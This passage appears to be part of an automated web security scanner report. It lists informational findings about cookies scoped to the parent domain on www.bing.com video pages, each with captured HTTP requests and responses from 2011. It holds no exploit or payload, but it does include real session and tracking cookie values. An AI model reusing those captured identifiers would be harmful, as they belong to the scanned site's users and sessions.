<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.254. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _HOP=I=1&TS=1296407506

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:47 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=2&TS=1296407507; domain=.bing.com; path=/
Set-Cookie: _UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/


16.255. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/


16.256. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69772
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:26 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.257. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 107914
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.547 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:54 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.258. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 105273
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.259. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76329
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.437 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:04 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.260. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 110111
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:32 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.062 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=31036; domain=.bing.com; path=/videos
Set-Cookie: ocid=31036; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.261. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 104406
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:42 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.262. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 109040
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.578 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:38 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.263. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 77783
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:17:39 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.264. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68975
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:25 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:25 GMT
Connection: close
Set-Cookie: _SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.265. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68842
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:34 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:34 GMT
Connection: close
Set-Cookie: _SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
